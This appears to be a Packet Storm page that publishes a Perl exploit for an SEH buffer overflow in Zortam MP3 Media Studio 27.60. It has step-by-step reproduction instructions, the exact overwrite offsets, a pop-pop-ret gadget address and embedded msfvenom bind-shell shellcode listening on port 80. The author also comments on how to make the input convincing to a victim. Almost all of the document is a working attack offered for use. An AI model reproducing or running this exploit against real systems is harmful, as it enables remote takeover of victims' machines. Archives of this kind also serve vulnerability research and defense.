exploit the possibilities

Zortam MP3 Media Studio 27.60 Remote Code Execution

Zortam MP3 Media Studio 27.60 Remote Code Execution
Posted Nov 20, 2020
Authored by Vincent Wolterman

Zortam MP3 Media Studio version 27.60 suffers from a code execution vulnerability.

tags | exploit, code execution
MD5 | a53536cec733866dd62729901b31c2ea

Zortam MP3 Media Studio 27.60 Remote Code Execution

Change Mirror Download
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272

$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)

$seh = "\x62\x59\x01\x10"; # seh overwrite
$nop = "\x90" x 12; # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes

$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";


$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);

print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
Login or Register to add favorites

File Archive:

December 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    22 Files
  • 2
    Dec 2nd
    33 Files
  • 3
    Dec 3rd
    16 Files
  • 4
    Dec 4th
    22 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close